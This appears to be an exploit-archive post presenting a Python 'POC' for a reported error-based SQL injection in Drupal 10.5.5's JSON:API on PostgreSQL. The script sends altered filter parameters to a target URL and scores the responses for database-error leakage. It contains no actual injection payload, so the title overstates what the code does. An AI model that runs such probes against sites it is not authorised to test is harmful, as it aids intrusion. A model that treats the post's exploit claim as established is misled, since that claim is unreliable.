Share
## https://sploitus.com/exploit?id=PACKETSTORM:223236
==================================================================================================================================
    | # Title     : Drupal core 10.5.5 JSON:API PostgreSQL Error-Based SQL Injection                                                 |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.drupal.org/project/drupal                                                                            |
    ==================================================================================================================================
    
    [+] Summary    : This code demonstrates a research-oriented implementation targeting a reported SQL injection condition in Drupal JSON:API endpoints backed by PostgreSQL.
    
    [+] POC        :  
    
    
    #!/usr/bin/env python3
    
    import requests
    import re
    import sys
    from urllib.parse import urlencode
    
    class DrupalJSONAPIAuditor:
        SQL_ERROR_PATTERNS = [
            r"postgresql",
            r"syntax error",
            r"sqlstate",
            r"invalid input syntax",
            r"query failed",
            r"database error",
            r"exception",
            r"stack trace",
            r"uncaught",
            r"warning:",
            r"fatal error",
            r"pdoexception",
            r"doctrine",
            r"sql error"
    
        ]
        def __init__(self, url):
            self.url = url
            self.headers = {
                "Accept":
                    "application/vnd.api+json",
                "Content-Type":
                    "application/vnd.api+json"
            }
        def send_request(self, params):
            try:
                r = requests.get(
                    self.url,
                    params=params,
                    headers=self.headers,
                    timeout=10
                )
                return {
                    "status":
                        r.status_code,
                    "length":
                        len(r.text),
                    "body":
                        r.text
                }
            except Exception as e:
                return {
                    "error":
                        str(e)
                }
        def baseline(self):
            params = {
                "filter[test][condition][path]":
                    "title",
                "filter[test][condition][operator]":
                    "=",
                "filter[test][condition][value]":
                    "example"
            }
            return self.send_request(
                params
            )
        def mutated_filters(self):
            tests = []
            candidates = [
                "unexpected",
                "nested",
                "long_key_name_" * 5,
                "special_chars",
                "duplicate"
            ]
            for name in candidates:
                params = {
                    f"filter[{name}][condition][path]":
                        "title",
                    f"filter[{name}][condition][operator]":
                        "IN",
                    f"filter[{name}][condition][value][0]":
                        "example"
                }
                tests.append(
                    (
                        name,
                        self.send_request(
                            params
                        )
                    )
                )
            return tests
        def detect_error_leakage(self, body):
            hits = []
            lower = body.lower()
            for p in self.SQL_ERROR_PATTERNS:
                if re.search(
                    p,
                    lower,
                    re.I
                ):
                    hits.append(
                        p
                    )
            return hits
        def compare_response(self, base, other):
            return {
                "status_change":
                    base["status"] !=
                    other["status"],
                "size_delta":
                    abs(
                        base["length"] -
                        other["length"]
                    )
            }
        def confidence(self, score):
            if score >= 5:
                return "HIGH"
            if score >= 2:
                return "MEDIUM"
            return "LOW"
        def run(self):
            print(
                f"[*] Auditing: {self.url}"
            )
            base = self.baseline()
            if "error" in base:
                print(
                    "[!] Request failed"
                )
                return
            score = 0
            print(
                f"[*] Baseline: "
                f"{base['status']} "
                f"({base['length']} bytes)"
            )
            results = self.mutated_filters()
            for name, result in results:
                if "error" in result:
                    continue
                diff = self.compare_response(
                    base,
                    result
                )
                leaks = self.detect_error_leakage(
                    result["body"]
                )
                print(
                    f"\n[{name}]"
                )
                print(
                    f"status change: "
                    f"{diff['status_change']}"
                )
                print(
                    f"size delta: "
                    f"{diff['size_delta']}"
                )
                if leaks:
                    print(
                        "error indicators:"
                    )
                    for l in leaks:
                        print(
                            f"  -> {l}"
                        )
                    score += len(leaks)
                if diff["status_change"]:
                    score += 1
                if diff["size_delta"] > 100:
    
                    score += 1
            print("\n==== SUMMARY ====")
            print(
                f"Exposure Score: {score}"
            )
            print(
                f"Confidence: "
                f"{self.confidence(score)}"
            )
    
    if __name__ == "__main__":
    
        if len(sys.argv) != 2:
            print(
    
                f"usage:\n"
                f"{sys.argv[0]} "
                f"http://host/jsonapi/node/article"
    
            )
            sys.exit(1)
        auditor = DrupalJSONAPIAuditor(
            sys.argv[1]
        )
        auditor.run()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================